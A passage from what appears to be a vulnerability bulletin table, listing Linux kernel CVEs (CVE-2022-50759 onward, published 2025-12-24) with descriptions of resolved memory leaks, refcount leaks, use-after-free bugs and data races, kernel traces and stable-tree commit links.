https://git.kernel.org/stable/c/cfdf139258614ef65b0f68b857ada5328fb7c0e5 https://git.kernel.org/stable/c/c8ff91535880d41b49699b3829fb6151942de29e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c: ov5648: Free V4L2 fwnode data on unbind The V4L2 fwnode data structure doesn't get freed on unbind, which leads to a memleak. | 2025-12-24 | not yet calculated | CVE-2022-50759 | https://git.kernel.org/stable/c/4a34fd4d9b548789d4a2018940edbec86282ed3b https://git.kernel.org/stable/c/3a54b72868930f07935accaf95ec4df639324940 https://git.kernel.org/stable/c/c95770e4fc172696dcb1450893cda7d6324d96fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix PCI device refcount leak in amdgpu_atrm_get_bios() As comment of pci_get_class() says, it returns a pci_device with its refcount increased and decreased the refcount for the input parameter @from if it is not NULL. If we break the loop in amdgpu_atrm_get_bios() with 'pdev' not NULL, we need to call pci_dev_put() to decrease the refcount. Add the missing pci_dev_put() to avoid refcount leak. | 2025-12-24 | not yet calculated | CVE-2022-50760 | https://git.kernel.org/stable/c/6611feef35c0c8c4d297b28a7fc6ab3a2c47eca7 https://git.kernel.org/stable/c/da7c78ea9e62bb65273d3ff19a3866ec205bfe18 https://git.kernel.org/stable/c/3360125d721c91d697c71201f18f042ff743e936 https://git.kernel.org/stable/c/981024abf5fe605c94d4f906f65d1b3408d628be https://git.kernel.org/stable/c/7c1ddf7c664b5bc91f14b1bdeaa45520ef1760e4 https://git.kernel.org/stable/c/8f2d2badf8ca5e7e7c30d88840b695c8af7286f3 https://git.kernel.org/stable/c/9d4057d0452243917e12eb19f1599c96f2f05b14 https://git.kernel.org/stable/c/a8b54ad7106c0604c4adc4933138b3557739bce0 https://git.kernel.org/stable/c/ca54639c7752edf1304d92ff4d0c049d4efc9ba0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/xen: Fix memory leak in xen_init_lock_cpu() In xen_init_lock_cpu(), the @name has allocated new string by kasprintf(), if bind_ipi_to_irqhandler() fails, it should be freed, otherwise may lead to a memory leak issue, fix it. | 2025-12-24 | not yet calculated | CVE-2022-50761 | https://git.kernel.org/stable/c/9278bdbb566656b3704704f8dd6cbc24a6fcc569 https://git.kernel.org/stable/c/07764d00c869a3390bd4f80412cc8b0e669e6c58 https://git.kernel.org/stable/c/53ff99c76be611acea37d33133c9136969914865 https://git.kernel.org/stable/c/29198f667f4486f9e227e11faf1411fcf4c82a66 https://git.kernel.org/stable/c/70e7f308d7a8e915c7fbc0f1d959968eab8000cd https://git.kernel.org/stable/c/70966d6b0f59f795b08a70adf5e4478348ecbfbb https://git.kernel.org/stable/c/798fc3cf98ca07e448956f39295c5d686ab4b054 https://git.kernel.org/stable/c/b44457b83a034efef58ffa5f3131d4615f1a9837 https://git.kernel.org/stable/c/ca84ce153d887b1dc8b118029976cc9faf2a9b40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Avoid UBSAN error on true_sectors_per_clst() syzbot reported UBSAN error as below: [ 76.901829][ T6677] ================================================================================ [ 76.903908][ T6677] UBSAN: shift-out-of-bounds in fs/ntfs3/super.c:675:13 [ 76.905363][ T6677] shift exponent -247 is negative This patch avoid this error. | 2025-12-24 | not yet calculated | CVE-2022-50762 | https://git.kernel.org/stable/c/4b51f27d4448c84957bce190292f75d4896d56b3 https://git.kernel.org/stable/c/8fe280ae85177c2323ae8c9849ff27a3a6b69506 https://git.kernel.org/stable/c/95afb464c86c6e9e95ea9e595282fa6f693072e8 https://git.kernel.org/stable/c/caad9dd8792a2622737b7273cb34835fd9536cd2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: marvell/octeontx - prevent integer overflows The "code_length" value comes from the firmware file. If your firmware is untrusted realistically there is probably very little you can do to protect yourself. Still we try to limit the damage as much as possible. Also Smatch marks any data read from the filesystem as untrusted and prints warnings if it not capped correctly. The "code_length * 2" can overflow. The round_up(ucode_size, 16) + sizeof() expression can overflow too. Prevent these overflows. | 2025-12-24 | not yet calculated | CVE-2022-50763 | https://git.kernel.org/stable/c/7bfa7d67735381715c98091194e81e7685f9b7db https://git.kernel.org/stable/c/12acfa1059ad69aa352ddb2bf23ba1b831aff15f https://git.kernel.org/stable/c/8f5eee162e55175d9dac98b5e9b8da76449d2257 https://git.kernel.org/stable/c/e7ff7a46baafd38d7ed45604397e650d61f5db8d https://git.kernel.org/stable/c/caca37cf6c749ff0303f68418cfe7b757a4e0697 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6/sit: use DEV_STATS_INC() to avoid data-races syzbot/KCSAN reported that multiple cpus are updating dev->stats.tx_error concurrently. This is because sit tunnels are NETIF_F_LLTX, meaning their ndo_start_xmit() is not protected by a spinlock. While original KCSAN report was about tx path, rx path has the same issue. | 2025-12-24 | not yet calculated | CVE-2022-50764 | https://git.kernel.org/stable/c/222cc04356984f3f98acfa756a69d4bed7c501ac https://git.kernel.org/stable/c/4eed93bb3e57b8cc78d17166a14e40a73276015a https://git.kernel.org/stable/c/207501a986831174df09a36a8cb62a28f92f0dc8 https://git.kernel.org/stable/c/cb34b7cf17ecf33499c9298943f85af247abc1e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RISC-V: kexec: Fix memory leak of elf header buffer This is reported by kmemleak detector: unreferenced object 0xff2000000403d000 (size 4096): comm "kexec", pid 146, jiffies 4294900633 (age 64.792s) hex dump (first 32 bytes): 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 .ELF............ 04 00 f3 00 01 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<00000000566ca97c>] kmemleak_vmalloc+0x3c/0xbe [<00000000979283d8>] __vmalloc_node_range+0x3ac/0x560 [<00000000b4b3712a>] __vmalloc_node+0x56/0x62 [<00000000854f75e2>] vzalloc+0x2c/0x34 [<00000000e9a00db9>] crash_prepare_elf64_headers+0x80/0x30c [<0000000067e8bf48>] elf_kexec_load+0x3e8/0x4ec [<0000000036548e09>] kexec_image_load_default+0x40/0x4c [<0000000079fbe1b4>] sys_kexec_file_load+0x1c4/0x322 [<0000000040c62c03>] ret_from_syscall+0x0/0x2 In elf_kexec_load(), a buffer is allocated via vzalloc() to store elf headers. While it's not freed back to system when kdump kernel is reloaded or unloaded, or when image->elf_header is successfully set and then fails to load kdump kernel for some reason. Fix it by freeing the buffer in arch_kimage_file_post_load_cleanup(). | 2025-12-24 | not yet calculated | CVE-2022-50765 | https://git.kernel.org/stable/c/090bfcfc9f14d05154893c67eeaecc56e894fbae https://git.kernel.org/stable/c/cdea2da6787583ecca43594132533a2ac8d7cd21 https://git.kernel.org/stable/c/cbc32023ddbdf4baa3d9dc513a2184a84080a5a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: set generation before calling btrfs_clean_tree_block in btrfs_init_new_buffer syzbot is reporting uninit-value in btrfs_clean_tree_block() [1], for commit bc877d285ca3dba2 ("btrfs: Deduplicate extent_buffer init code") missed that btrfs_set_header_generation() in btrfs_init_new_buffer() must not be moved to after clean_tree_block() because clean_tree_block() is calling btrfs_header_generation() since commit 55c69072d6bd5be1 ("Btrfs: Fix extent_buffer usage when nodesize != leafsize"). Since memzero_extent_buffer() will reset "struct btrfs_header" part, we can't move btrfs_set_header_generation() to before memzero_extent_buffer(). Just re-add btrfs_set_header_generation() before btrfs_clean_tree_block(). | 2025-12-24 | not yet calculated | CVE-2022-50766 | https://git.kernel.org/stable/c/0a408c6212c16b9a2a1141d3c531247582ef8101 https://git.kernel.org/stable/c/a687c2890fe4a2acaac6941fa4097a1264d8f3eb https://git.kernel.org/stable/c/89bc41c92d10b905c60f6ec13c9ef664a3555c54 https://git.kernel.org/stable/c/cbddcc4fa3443fe8cfb2ff8e210deb1f6a0eea38 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: smscufx: Fix several use-after-free bugs Several types of UAFs can occur when physically removing a USB device. Adds ufx_ops_destroy() function to .fb_destroy of fb_ops, and in this function, there is kref_put() that finally calls ufx_free(). This fix prevents multiple UAFs. | 2025-12-24 | not yet calculated | CVE-2022-50767 | https://git.kernel.org/stable/c/6f2075ea883e5d7730d0c9ebb1bb8e7a1a7e953f https://git.kernel.org/stable/c/3f40852d671072836fb7ae331a1f28a24223c4e8 https://git.kernel.org/stable/c/70faf9d9b6cc74418716bbf76fe75bd2da10ad4a https://git.kernel.org/stable/c/5385af2f89bc352fb70753ab41b2bb036190141f https://git.kernel.org/stable/c/d9ddfeb01fb95ffbbc7031d46a5ee2a5e45cbb86 https://git.kernel.org/stable/c/cc6a7249842fceda7574ceb63275a2d5e99d2862 https://git.kernel.org/stable/c/8d924b262f3178a9b17c17d4306a9f426c508bd9 https://git.kernel.org/stable/c/cc67482c9e5f2c80d62f623bcc347c29f9f648e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Correct device removal for multi-actuator devices Correct device count for multi-actuator drives which can cause kernel panics. | 2025-12-24 | not yet calculated | CVE-2022-50768 | https://git.kernel.org/stable/c/e8e9e0c28901d34beb193b5ece52eb7c656f4042 https://git.kernel.org/stable/c/d1c8b86b4ab7e8588a8cfadbdd6f20adbb15c938 https://git.kernel.org/stable/c/cc9befcbbb5ebce77726f938508700d913530035 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: mxcmmc: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, the memory that allocated in mmc_alloc_host() will be leaked and it will lead a kernel crash because of deleting not added device in the remove path. So fix this by checking the return value and goto error path which will call mmc_free_host(). | 2025-12-24 | not yet calculated | CVE-2022-50769 | https://git.kernel.org/stable/c/5f35c038c9f4d258b3cf77885a2730f1417d63e7 https://git.kernel.org/stable/c/1cf0c1e58738b97e2de207846105b6a5d46622ee https://git.kernel.org/stable/c/b8bdb3fd13d5cd1e86d22fd3f803a742fd88af89 https://git.kernel.org/stable/c/32eb502c972dfc34413c9147418b3d94d870c2b8 https://git.kernel.org/stable/c/3904eb97bb78fdca3e16d30a38ce5697b9686110 https://git.kernel.org/stable/c/2d496050ded83b13b16f05e1fc0329b0210d2493 https://git.kernel.org/stable/c/d37474ab9a79149075f0823315c6d45dd983a78c https://git.kernel.org/stable/c/d2ead18bc7cc166220cab5a744a05c5b69431a12 https://git.kernel.org/stable/c/cde600af7b413c9fe03e85c58c4279df90e91d13 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix memory leak in ocfs2_mount_volume() There is a memory leak reported by kmemleak: unreferenced object 0xffff88810cc65e60 (size 32): comm "mount.ocfs2", pid 23753, jiffies 4302528942 (age 34735.105s) hex dump (first 32 bytes): 10 00 00 00 00 00 00 00 00 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 ................ backtrace: [<ffffffff8170f73d>] __kmalloc+0x4d/0x150 [<ffffffffa0ac3f51>] ocfs2_compute_replay_slots+0x121/0x330 [ocfs2] [<ffffffffa0b65165>] ocfs2_check_volume+0x485/0x900 [ocfs2] [<ffffffffa0b68129>] ocfs2_mount_volume.isra.0+0x1e9/0x650 [ocfs2] [<ffffffffa0b7160b>] ocfs2_fill_super+0xe0b/0x1740 [ocfs2] [<ffffffff818e1fe2>] mount_bdev+0x312/0x400 [<ffffffff819a086d>] legacy_get_tree+0xed/0x1d0 [<ffffffff818de82d>] vfs_get_tree+0x7d/0x230 [<ffffffff81957f92>] path_mount+0xd62/0x1760 [<ffffffff81958a5a>] do_mount+0xca/0xe0 [<ffffffff81958d3c>] __x64_sys_mount+0x12c/0x1a0 [<ffffffff82f26f15>] do_syscall_64+0x35/0x80 [<ffffffff8300006a>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 This call stack is related to two problems. Firstly, the ocfs2 super uses "replay_map" to trace online/offline slots, in order to recover offline slots during recovery and mount. But when ocfs2_truncate_log_init() returns an error in ocfs2_mount_volume(), the memory of "replay_map" will not be freed in error handling path. Secondly, the memory of "replay_map" will not be freed if d_make_root() returns an error in ocfs2_fill_super(). But the memory of "replay_map" will be freed normally when completing recovery and mount in ocfs2_complete_mount_recovery(). Fix the first problem by adding error handling path to free "replay_map" when ocfs2_truncate_log_init() fails. And fix the second problem by calling ocfs2_free_replay_slots(osb) in the error handling path "out_dismount". In addition, since ocfs2_free_replay_slots() is static, it is necessary to remove its static attribute and declare it in header file. | 2025-12-24 | not yet calculated | CVE-2022-50770 | https://git.kernel.org/stable/c/7ef516888c4d30ae41bfcd79e7077d86d92794c5 https://git.kernel.org/stable/c/2b7e59ed2e77136e9360274f8f0fc208a003e95c https://git.kernel.org/stable/c/8059e200259e9c483d715fc2df6340c227c3e196 https://git.kernel.org/stable/c/4efe1d2db731bad19891e2fb9b338724b1f598cc https://git.kernel.org/stable/c/50ab0ca3aff4da26037113d69f5a756d8c1a92cd https://git.kernel.org/stable/c/ce2fcf1516d674a174d9b34d1e1024d64de9fba3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcu: Fix __this_cpu_read() lockdep warning in rcu_force_quiescent_state() Running rcutorture with non-zero fqs_duration module parameter in a kernel built with CONFIG_PREEMPTION=y results in the following splat: BUG: using __this_cpu_read() in preemptible [00000000] code: rcu_torture_fqs/398 caller is __this_cpu_preempt_check+0x13/0x20 CPU: 3 PID: 398 Comm: rcu_torture_fqs Not tainted 6.0.0-rc1-yoctodev-standard+ Call Trace: <TASK> dump_stack_lvl+0x5b/0x86 dump_stack+0x10/0x16 check_preemption_disabled+0xe5/0xf0 __this_cpu_preempt_check+0x13/0x20 rcu_force_quiescent_state.part.0+0x1c/0x170 rcu_force_quiescent_state+0x1e/0x30 rcu_torture_fqs+0xca/0x160 ? rcu_torture_boost+0x430/0x430 kthread+0x192/0x1d0 ? kthread_complete_and_exit+0x30/0x30 ret_from_fork+0x22/0x30 </TASK> The problem is that rcu_force_quiescent_state() uses __this_cpu_read() in preemptible code instead of the proper raw_cpu_read(). This commit therefore changes __this_cpu_read() to raw_cpu_read(). | 2025-12-24 | not yet calculated | CVE-2022-50771 | https://git.kernel.org/stable/c/3d92527a919edd1aa381bdd6c299dd75a8167396 https://git.kernel.org/stable/c/5a52380b8193cf8be6c4a6b94b86ef64ed80c0dc https://git.kernel.org/stable/c/98a5b1265a36e9d843a51ddd6c9fa02da50d2c57 https://git.kernel.org/stable/c/a74af9b937707b42c3fd041aae1ed4ce2f337307 https://git.kernel.org/stable/c/80a3e7ab477b3655615fc1627c88c248d4ad28d9 https://git.kernel.org/stable/c/ceb1c8c9b8aa9199da46a0f29d2d5f08d9b44c15 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netdevsim: fix memory leak in nsim_bus_dev_new() If device_register() failed in nsim_bus_dev_new(), the value of reference in nsim_bus_dev->dev is 1. obj->name in nsim_bus_dev->dev will not be released. unreferenced object 0xffff88810352c480 (size 16): comm "echo", pid 5691, jiffies 4294945921 (age 133.270s) hex dump (first 16 bytes): 6e 65 74 64 65 76 73 69 6d 31 00 00 00 00 00 00 netdevsim1...... backtrace: [<000000005e2e5e26>] __kmalloc_node_track_caller+0x3a/0xb0 [<0000000094ca4fc8>] kvasprintf+0xc3/0x160 [<00000000aad09bcc>] kvasprintf_const+0x55/0x180 [<000000009bac868d>] kobject_set_name_vargs+0x56/0x150 [<000000007c1a5d70>] dev_set_name+0xbb/0xf0 [<00000000ad0d126b>] device_add+0x1f8/0x1cb0 [<00000000c222ae24>] new_device_store+0x3b6/0x5e0 [<0000000043593421>] bus_attr_store+0x72/0xa0 [<00000000cbb1833a>] sysfs_kf_write+0x106/0x160 [<00000000d0dedb8a>] kernfs_fop_write_iter+0x3a8/0x5a0 [<00000000770b66e2>] vfs_write+0x8f0/0xc80 [<0000000078bb39be>] ksys_write+0x106/0x210 [<00000000005e55a4>] do_syscall_64+0x35/0x80 [<00000000eaa40bbc>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2022-50772 | https://git.kernel.org/stable/c/77579e4065295071fbd9662f03430dca5b50b086 https://git.kernel.org/stable/c/cf2010aa1c739bab067cbc90b690d28eaa0b47da |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: mts64: fix possible null-ptr-defer in snd_mts64_interrupt I got a null-ptr-defer error report when I do the following tests on the qemu platform: make defconfig and CONFIG_PARPORT=m, CONFIG_PARPORT_PC=m, CONFIG_SND_MTS64=m Then making test scripts: cat>test_mod1.sh<<EOF modprobe snd-mts64 modprobe snd-mts64 EOF Executing the script, perhaps several times, we will get a null-ptr-defer report, as follow: syzkaller:~# ./test_mod.sh snd_mts64: probe of snd_mts64.0 failed with error -5 modprobe: ERROR: could not insert 'snd_mts64': No such device BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] PREEMPT SMP PTI CPU: 0 PID: 205 Comm: modprobe Not tainted 6.1.0-rc8-00588-g76dcd734eca2 #6 Call Trace: <IRQ> snd_mts64_interrupt+0x24/0xa0 [snd_mts64] parport_irq_handler+0x37/0x50 [parport] __handle_irq_event_percpu+0x39/0x190 handle_irq_event_percpu+0xa/0x30 handle_irq_event+0x2f/0x50 handle_edge_irq+0x99/0x1b0 __common_interrupt+0x5d/0x100 common_interrupt+0xa0/0xc0 </IRQ> <TASK> asm_common_interrupt+0x22/0x40 RIP: 0010:_raw_write_unlock_irqrestore+0x11/0x30 parport_claim+0xbd/0x230 [parport] snd_mts64_probe+0x14a/0x465 [snd_mts64] platform_probe+0x3f/0xa0 really_probe+0x129/0x2c0 __driver_probe_device+0x6d/0xc0 driver_probe_device+0x1a/0xa0 __device_attach_driver+0x7a/0xb0 bus_for_each_drv+0x62/0xb0 __device_attach+0xe4/0x180 bus_probe_device+0x82/0xa0 device_add+0x550/0x920 platform_device_add+0x106/0x220 snd_mts64_attach+0x2e/0x80 [snd_mts64] port_check+0x14/0x20 [parport] bus_for_each_dev+0x6e/0xc0 __parport_register_driver+0x7c/0xb0 [parport] snd_mts64_module_init+0x31/0x1000 [snd_mts64] do_one_initcall+0x3c/0x1f0 do_init_module+0x46/0x1c6 load_module+0x1d8d/0x1e10 __do_sys_finit_module+0xa2/0xf0 do_syscall_64+0x37/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> Kernel panic - not syncing: Fatal exception in interrupt Rebooting in 1 seconds.. The mts wa not initialized during interrupt, we add check for mts to fix this bug. | 2025-12-24 | not yet calculated | CVE-2022-50773 | https://git.kernel.org/stable/c/06ec592389f2be3199779ab823c4323dcfd2121f https://git.kernel.org/stable/c/b471fe61da523a15e4cb60fa81f5a2377e4bad98 https://git.kernel.org/stable/c/7e91667db38abb056da5a496d40fbd044c66bed2 https://git.kernel.org/stable/c/c7e9624d90bf20f1eed6b228949396d614b94020 https://git.kernel.org/stable/c/0649129359219ce6ff380ec401f87308485c6ae3 https://git.kernel.org/stable/c/cba633b24a98d957e8190ef8bc4d4cdb4f6e9313 https://git.kernel.org/stable/c/1a763c748acd5540ccc43306c57c9c6c5fb60884 https://git.kernel.org/stable/c/250eed7b9994d79f9c409f954dbd08e88f5afd83 https://git.kernel.org/stable/c/cf2ea3c86ad90d63d1c572b43e1ca9276b0357ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: qat - fix DMA transfer direction When CONFIG_DMA_API_DEBUG is selected, while running the crypto self test on the QAT crypto algorithms, the function add_dma_entry() reports a warning similar to the one below, saying that overlapping mappings are not supported. This occurs in tests where the input and the output scatter list point to the same buffers (i.e. two different scatter lists which point to the same chunks of memory). The logic that implements the mapping uses the flag DMA_BIDIRECTIONAL for both the input and the output scatter lists which leads to overlapped write mappings. These are not supported by the DMA layer. Fix by specifying the correct DMA transfer directions when mapping buffers. For in-place operations where the input scatter list matches the output scatter list, buffers are mapped once with DMA_BIDIRECTIONAL, otherwise input buffers are mapped using the flag DMA_TO_DEVICE and output buffers are mapped with DMA_FROM_DEVICE. Overlapping a read mapping with a write mapping is a valid case in dma-coherent devices like QAT. The function that frees and unmaps the buffers, qat_alg_free_bufl() has been changed accordingly to the changes to the mapping function. DMA-API: 4xxx 0000:06:00.0: cacheline tracking EEXIST, overlapping mappings aren't supported WARNING: CPU: 53 PID: 4362 at kernel/dma/debug.c:570 add_dma_entry+0x1e9/0x270 ... Call Trace: dma_map_page_attrs+0x82/0x2d0 ? preempt_count_add+0x6a/0xa0 qat_alg_sgl_to_bufl+0x45b/0x990 [intel_qat] qat_alg_aead_dec+0x71/0x250 [intel_qat] crypto_aead_decrypt+0x3d/0x70 test_aead_vec_cfg+0x649/0x810 ? number+0x310/0x3a0 ? vsnprintf+0x2a3/0x550 ? scnprintf+0x42/0x70 ? valid_sg_divisions.constprop.0+0x86/0xa0 ? test_aead_vec+0xdf/0x120 test_aead_vec+0xdf/0x120 alg_test_aead+0x185/0x400 alg_test+0x3d8/0x500 ? crypto_acomp_scomp_free_ctx+0x30/0x30 ? __schedule+0x32a/0x12a0 ? ttwu_queue_wakelist+0xbf/0x110 ? _raw_spin_unlock_irqrestore+0x23/0x40 ? try_to_wake_up+0x83/0x570 ? _raw_spin_unlock_irqrestore+0x23/0x40 ? __set_cpus_allowed_ptr_locked+0xea/0x1b0 ? crypto_acomp_scomp_free_ctx+0x30/0x30 cryptomgr_test+0x27/0x50 kthread+0xe6/0x110 ? kthread_complete_and_exit+0x20/0x20 ret_from_fork+0x1f/0x30 | 2025-12-24 | not yet calculated | CVE-2022-50774 | https://git.kernel.org/stable/c/426d5bc089e7731e36b514d1beca19e777a2d653 https://git.kernel.org/stable/c/1f1ab76e251521bd2fa5244473efcf663792745d https://git.kernel.org/stable/c/429348d4f675e9eb418d0829064c4d7d06bd66a3 https://git.kernel.org/stable/c/c4c9d9edf4848aed89516b23b88950b194beff6a https://git.kernel.org/stable/c/cf5bb835b7c8a5fee7f26455099cca7feb57f5e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix refcount leak in hns_roce_mmap rdma_user_mmap_entry_get_pgoff() takes the reference. Add missing rdma_user_mmap_entry_put() to release the reference. Acked-by Haoyue Xu <xuhaoyue1@hisilicon.com> | 2025-12-24 | not yet calculated | CVE-2022-50775 | https://git.kernel.org/stable/c/fa87cf2e756efe809ee8683d4f282f4de962dab6 https://git.kernel.org/stable/c/8abd2ff2256a2a99c11c7ecdcb5512429933620f https://git.kernel.org/stable/c/cf6a05c8494a8ae7fec8e5f1229b45ca5b4bcd30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: st: Fix memory leak in st_of_quadfs_setup() If st_clk_register_quadfs_pll() fails, @lock should be freed before goto @err_exit, otherwise will cause meory leak issue, fix it. | 2025-12-24 | not yet calculated | CVE-2022-50776 | https://git.kernel.org/stable/c/081538ae5817631a2b99e8e75cce981060aab29f https://git.kernel.org/stable/c/f0295209de457049a4a5f3e3985528391bd1ab34 https://git.kernel.org/stable/c/be03875007621fcee96e6f9fd7b9e59c8dfcf6fa https://git.kernel.org/stable/c/713ad301c2d49e88fe586b57ebac8f220a98e162 https://git.kernel.org/stable/c/efd025f32fce27a8ada9bcb4731e8a84476e5b3d https://git.kernel.org/stable/c/adf6a00859d014cecf046dc91f75c0e65a544360 https://git.kernel.org/stable/c/335ef7546c77e63154d6ea4d603b11274a85900e https://git.kernel.org/stable/c/f4731395d6db850127634197863aede188d8e9de https://git.kernel.org/stable/c/cfd3ffb36f0d566846163118651d868e607300ba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: phy: xgmiitorgmii: Fix refcount leak in xgmiitorgmii_probe of_phy_find_device() return device node with refcount incremented. Call put_device() to relese it when not needed anymore. | 2025-12-24 | not yet calculated | CVE-2022-50777 | https://git.kernel.org/stable/c/53526dbc8aa6b95e9fc2ab1e29b1a9145721da24 https://git.kernel.org/stable/c/78b0b1ff525d9be4babf5a148a4de0d50042d95d https://git.kernel.org/stable/c/00616bd1913a4f879679e02dc08c2f501ca2bd4c https://git.kernel.org/stable/c/106d0d33c9d1ec4ddeeffc1fdc717ff09953d4ed https://git.kernel.org/stable/c/4d112f001612c79927c1ecf29522b34c4fa292e0 https://git.kernel.org/stable/c/52841e71253e6ace72751c72560950474a57d04c https://git.kernel.org/stable/c/ee84d37a5f08ed1121cdd16f8f3ed87552087a21 https://git.kernel.org/stable/c/d039535850ee47079d59527e96be18d8e0daa84b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fortify: Fix __compiletime_strlen() under UBSAN_BOUNDS_LOCAL With CONFIG_FORTIFY=y and CONFIG_UBSAN_LOCAL_BOUNDS=y enabled, we observe a runtime panic while running Android's Compatibility Test Suite's (CTS) android.hardware.input.cts.tests. This is stemming from a strlen() call in hidinput_allocate(). __compiletime_strlen() is implemented in terms of __builtin_object_size(), then does an array access to check for NUL-termination. A quirk of __builtin_object_size() is that for strings whose values are runtime dependent, __builtin_object_size(str, 1 or 0) returns the maximum size of possible values when those sizes are determinable at compile time. Example: static const char *v = "FOO BAR"; static const char *y = "FOO BA"; unsigned long x (int z) { // Returns 8, which is: // max(__builtin_object_size(v, 1), __builtin_object_size(y, 1)) return __builtin_object_size(z ? v : y, 1); } So when FORTIFY_SOURCE is enabled, the current implementation of __compiletime_strlen() will try to access beyond the end of y at runtime using the size of v. Mixed with UBSAN_LOCAL_BOUNDS we get a fault. hidinput_allocate() has a local C string whose value is control flow dependent on a switch statement, so __builtin_object_size(str, 1) evaluates to the maximum string length, making all other cases fault on the last character check. hidinput_allocate() could be cleaned up to avoid runtime calls to strlen() since the local variable can only have literal values, so there's no benefit to trying to fortify the strlen call site there. Perform a __builtin_constant_p() check against index 0 earlier in the macro to filter out the control-flow-dependant case. Add a KUnit test for checking the expected behavioral characteristics of FORTIFY_SOURCE internals. | 2025-12-24 | not yet calculated | CVE-2022-50778 | https://git.kernel.org/stable/c/ed42391164e6839a48aaf4c53eefda516835e799 https://git.kernel.org/stable/c/5d59ad2bfb35fccfe2ad5e8bb8801f6224d3f7d4 https://git.kernel.org/stable/c/d07c0acb4f41cc42a0d97530946965b3e4fa68c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: orangefs: Fix kmemleak in orangefs_prepare_debugfs_help_string() When insert and remove the orangefs module, then debug_help_string will be leaked: unreferenced object 0xffff8881652ba000 (size 4096): comm "insmod", pid 1701, jiffies 4294893639 (age 13218.530s) hex dump (first 32 bytes): 43 6c 69 65 6e 74 20 44 65 62 75 67 20 4b 65 79 Client Debug Key 77 6f 72 64 73 20 61 72 65 20 75 6e 6b 6e 6f 77 words are unknow backtrace: [<0000000004e6f8e3>] kmalloc_trace+0x27/0xa0 [<0000000006f75d85>] orangefs_prepare_debugfs_help_string+0x5e/0x480 [orangefs] [<0000000091270a2a>] _sub_I_65535_1+0x57/0xf70 [crc_itu_t] [<000000004b1ee1a3>] do_one_initcall+0x87/0x2a0 [<000000001d0614ae>] do_init_module+0xdf/0x320 [<00000000efef068c>] load_module+0x2f98/0x3330 [<000000006533b44d>] __do_sys_finit_module+0x113/0x1b0 [<00000000a0da6f99>] do_syscall_64+0x35/0x80 [<000000007790b19b>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 When remove the module, should always free debug_help_string. Should always free the allocated buffer when change the free_debug_help_string. | 2025-12-24 | not yet calculated | CVE-2022-50779 | https://git.kernel.org/stable/c/44d3eac26a5e5268d11cc342dc202b0d31505c0a https://git.kernel.org/stable/c/f2b8a6aac561a49fe02c99683c40a8b87a9f68fc https://git.kernel.org/stable/c/ba9d3b9cec20957fd86bb1bf525b4ea8b64b2dea https://git.kernel.org/stable/c/2e7c09121064df93c58bbc49d3d0f608d3f584bd https://git.kernel.org/stable/c/b8affa0c6405ee968dcb6030bee2cf719a464752 https://git.kernel.org/stable/c/39529b79b023713d4f2d3479dc0ca43ba99df726 https://git.kernel.org/stable/c/3fc221d9a16339a913a0341d3efc7fef339073e1 https://git.kernel.org/stable/c/19be31668552a198e887762e25bdcc560800ecb4 https://git.kernel.org/stable/c/d23417a5bf3a3afc55de5442eb46e1e60458b0a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: fix UAF issue in nfqnl_nf_hook_drop() when ops_init() failed When the ops_init() interface is invoked to initialize the net, but ops->init() fails, data is released. However, the ptr pointer in net->gen is invalid. In this case, when nfqnl_nf_hook_drop() is invoked to release the net, invalid address access occurs. The process is as follows: setup_net() ops_init() data = kzalloc(...) ---> alloc "data" net_assign_generic() ---> assign "date" to ptr in net->gen ... ops->init() ---> failed ... kfree(data); ---> ptr in net->gen is invalid ... ops_exit_list() ... nfqnl_nf_hook_drop() *q = nfnl_queue_pernet(net) ---> q is invalid The following is the Call Trace information: BUG: KASAN: use-after-free in nfqnl_nf_hook_drop+0x264/0x280 Read of size 8 at addr ffff88810396b240 by task ip/15855 Call Trace: <TASK> dump_stack_lvl+0x8e/0xd1 print_report+0x155/0x454 kasan_report+0xba/0x1f0 nfqnl_nf_hook_drop+0x264/0x280 nf_queue_nf_hook_drop+0x8b/0x1b0 __nf_unregister_net_hook+0x1ae/0x5a0 nf_unregister_net_hooks+0xde/0x130 ops_exit_list+0xb0/0x170 setup_net+0x7ac/0xbd0 copy_net_ns+0x2e6/0x6b0 create_new_namespaces+0x382/0xa50 unshare_nsproxy_namespaces+0xa6/0x1c0 ksys_unshare+0x3a4/0x7e0 __x64_sys_unshare+0x2d/0x40 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 </TASK> Allocated by task 15855: 